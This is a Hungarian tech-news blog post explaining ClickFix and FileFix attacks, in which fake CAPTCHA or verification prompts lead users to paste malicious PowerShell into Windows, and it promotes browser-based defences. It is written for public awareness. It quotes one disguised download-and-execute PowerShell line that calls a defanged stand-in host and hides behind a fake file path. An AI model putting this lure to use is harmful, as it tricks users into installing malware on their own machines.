Veszély a böngészőből: így trükköznek a ClickFix és FileFix támadásokkal!

Veszély a böngészőből: így trükköznek a ClickFix és FileFix támadásokkal!
Az utóbbi időszakban különösen veszélyes támadási módszer terjedt el az interneten, amelynek lényege, hogy ártalmatlannak tűnő weboldalakon keresztül vehetik rá a felhasználókat arra, hogy saját maguk futtassanak le káros kódokat a számítógépükön. Az átverés neve ClickFix, és az egészben az a legveszélyesebb, hogy a felhasználó szinte semmit sem vesz észre, miközben maga segíti hozzá a támadót a rendszer feltöréséhez.

Így működik a ClickFix: átverés egy kattintással

A ClickFix támadásoknál a támadók megtévesztő weboldalt hoznak létre, gyakran például hamis CAPTCHA-ellenőrzéssel. Ha valaki rákattint egy ilyen, látszólag problémát megoldani hivatott elemre, a weboldal észrevétlenül másol rosszindulatú kódot a felhasználó vágólapjára. Ezután felszólítják a felhasználót, hogy igazolja magát – tipikusan úgy, hogy a vágólap tartalmát illessze be a Windows Futtatás ablakába.

Lényeges, hogy a megtévesztett felhasználó ebben a pillanatban maga hajtja végre a támadók kódját a saját gépén, abban a hitben, hogy csak egy, az emberi mivoltát igazoló tesztet erősít meg. Ezzel a trükkel a támadók anélkül tudnak támadni, hogy bármilyen vírus áthágná az operációs rendszer védelmi vonalait – minden az emberi tényezőn múlik.

Valós példa: kattintás egy találatra, kártékony PowerShell a vágólapon

Egy valós céges példában az egyik felhasználó egy keresési találatot követve olyan oldalra tévedt, ahol a támadók már elhelyezték a káros JavaScript kódot. A clickfixes prompt felugrott, és ha nem lett volna aktív a Keep Aware böngészővédelmi rendszer, a felhasználó észrevétlenül másolta volna át a kártékony PowerShell-parancsot, majd futtatta volna azt.

Ezzel szemben a Keep Aware valós időben észlelte, blokkolta, és figyelmeztetett a gyanús kódfeltöltésre, így megelőzte a további fertőzést. Ha nem lép közbe a védelmi rendszer, a támadás a háttérben úgy zajlott volna le, hogy néhány fájlt letölt, lefordítja a kódot, beállítja a fenyegetést a Windows automatikus futtatásához – így minden bejelentkezéskor újraindul a kártevő.

Az ilyen trükkök célja általában káros programok telepítése: például távoli elérésű trójai (RAT), adatszivárogtató programok, illetve további kártevők – például NetSupport Manager, AsyncRAT, Skuld Stealer, Lumma Stealer, DarkGate kártevő vagy DanaBot stealer.

A következő szint: FileFix – már a fájlkezelő is veszélyes

A támadók azonban nem ülnek a babérjaikon; a ClickFix mellett megjelent a FileFix nevű „új generáció”, amelyet biztonsági kutatók idén júniusban fedeztek fel. A FileFix lényege, hogy a felhasználót ráveszi: egy, fájlútvonalnak látszó, de valójában PowerShell-parancsot tartalmazó sort illesszen be közvetlenül a Windows Fájlkezelő címsorába.

A trükk annyira jól álcázott, hogy első pillantásra teljesen ártatlan útvonalnak tűnik – például:
powershell.exe -c “iwr káros[.]webhely/mal.jpg|iex” # C:CégBelsőDrivePályázat.pdf
A komment mögé rejtett fájlútvonal eltereli a figyelmet, miközben a valós fenyegetés (a letöltött kártevő) már a háttérben aktiválódik.

Fontos, hogy a FileFix ugyanarra az elvre épül, mint a ClickFix: mindkettő a vágólap manipulálásához és ahhoz kéri a felhasználó segítségét, hogy maga hajtsa végre a futtatáshoz szükséges parancsokat a saját gépén. A fő különbség, hogy a FileFix a böngészőből átterjed a fájlkezelőre is.


A védekezés leghatékonyabb módja: böngészőalapú védelem

Ennek fényében világos, hogy a hagyományos vírusirtók és klasszikus IT-védelem gyakran vak a vágólap manipulációjára és a böngészőben megbúvó fenyegetésekre. Az ilyen támadások elleni védelem kulcsa, hogy már a böngészőben felismerjük a csalafinta vágólap-módosításokat, felhasználói interakciókat, és időben blokkoljuk a rossz szándékot.

A Keep Aware és más, böngészőbe épülő, valós idejű védelmi rendszerek képesek azonnal érzékelni a vágólap gyanús feltöltését, blokkolják a kódot, mielőtt az eljuthatna a Windows termináljáig vagy a Fájlkezelőhöz.

Fontos kiemelni, hogy napjaink munkavégzésének nagy része böngészőben történik – és a támadók pontosan ezt használják ki. Aki nem biztosítja megfelelően böngészőjét, az valójában az egész rendszerét kockára teszi.

Mi a tanulság?

A ClickFix és FileFix támadások megjelenése új szintre emelte a social engineering támadásokat: már nemcsak gyanús csatolmányokat kell kerülni, hanem szinte bármilyen weboldaltól, ártalmatlan felugró ablaktól vagy másolásra buzdító üzenettől is óvatosnak kell lenni. Lényeges, hogy a védelem nem csak az antivírusokon, hanem a böngésző belső szabályain és a felhasználói tudatosságon is múlik. Felhasználók és rendszergazdák számára egyszerű szabály: soha ne illesszen be, és ne futtasson le ismeretlen eredetű parancsokat – még akkor sem, ha az egy CAPTCHA-t vagy fájlútvonalat imitál.

2025, adminboss, www.bleepingcomputer.com alapján

  • Mit gondolsz, mennyire lehet megbízni egy ismeretlen weboldal üzenetében?
  • Te mit tettél volna, ha ilyen gyanús üzenetet kapsz, amit nem értesz teljesen?
  • Szerinted mennyire lehet etikus, ha a támadók ilyen trükkös módon próbálják meg átvágni az embereket?



Legfrissebb posztok

Az MI már szól, ha túl sokat beszélsz vele

MA 15:01

Az MI már szól, ha túl sokat beszélsz vele

Az OpenAI új funkciója mostantól figyelmeztet, ha túl hosszúra nyúlik a csevegés a ChatGPT-vel. Finom emlékeztetők jelennek meg felugró ablakban, amelyek csak továbblépés után teszik lehetővé a beszélgetés...

Az űrből jön a zaj: a Starlink műholdak megzavarják a tudományt

MA 14:51

Az űrből jön a zaj: a Starlink műholdak megzavarják a tudományt

🚀 Egy ausztráliai kutatás 76 millió rádióteleszkópos képet vizsgált át, és riasztó mennyiségű zavart talált a Starlink műholdak miatt. A Square Kilométeres Háló (Square Kilometre Array, SKA) prototípusának adatai...

Az acél, ami kibírná a fúziós energiát? Még várnunk kell rá

MA 14:26

Az acél, ami kibírná a fúziós energiát? Még várnunk kell rá

🧠 Az atommagfúzió az energiatermelés egyik legígéretesebb tiszta forrása lehet, mivel két könnyű atommagot egyesít, szemben az atommaghasadással, amely egy nehéz atommagot hasít szét. Jelentősége abban rejlik, hogy a...

Az óriási rejtett felhő, amely a Tejútrendszer szívét táplálja

MA 14:01

Az óriási rejtett felhő, amely a Tejútrendszer szívét táplálja

Egy elképesztő, 200 fényév széles gáz- és porfelhő rejtőzik a Tejútrendszer eddig kevéssé feltérképezett régiójában. A Középpont felhőnek (Midpoint Cloud) elnevezett óriás molekulafelhőt a Green Bank rádiótávcső fedezte...

Az új járvány New Yorkban már két halálos áldozatot követelt

MA 13:51

Az új járvány New Yorkban már két halálos áldozatot követelt

Egy veszélyes baktériumfertőzés, a legionáriusbetegség (Legionnaires’ disease) ütötte fel a fejét Harlemben, New Yorkban, amely eddig két halálos áldozatot követelt, és összesen 58 regisztrált fertőzöttet találtak. Ez a...

Az első molekulák meglepő titkai: megdöntött elméletek

MA 13:26

Az első molekulák meglepő titkai: megdöntött elméletek

🔬 Nem mindennapi áttörést értek el a tudósok: laboratóriumi körülmények között alkották újra az univerzum első molekuláit, és ezzel alapjaiban kérdőjelezik meg a csillagok keletkezéséről szóló eddigi elképzeléseinket. A...

Az ősi vírus-baktérium háború: Megmenthetik-e a fágok az emberiséget?

MA 13:01

Az ősi vírus-baktérium háború: Megmenthetik-e a fágok az emberiséget?

💀 Az antibiotikumok korában azt hihetnénk, hogy a baktériumok és az emberiség közötti háborút mi nyerjük, azonban egyre több baktérium válik ellenállóvá a gyógyszerekkel szemben. Az úgynevezett antimikrobiális rezisztencia...

Az új trükk: most a YouTube is másol

MA 12:50

Az új trükk: most a YouTube is másol

A YouTube új funkcióval kísérletezik, amely lehetővé teszi a tartalomgyártók számára, hogy közvetlenül megjelöljék együttműködő partnereiket a videóikban. Így a nézők könnyebben fedezhetik fel és követhetik a közreműködő...

Az Apple Perplexity MI-őrületet venne?

MA 12:25

Az Apple Perplexity MI-őrületet venne?

👀 Az Apple vezetői egy belső fórumon arról egyeztetnek, hogy ajánlatot tegyenek-e a gyorsan növekvő Perplexity MI-cég megvásárlására. A Perplexity az egyik legfelkapottabb MI-alapú webes kereső, melynek értéke a...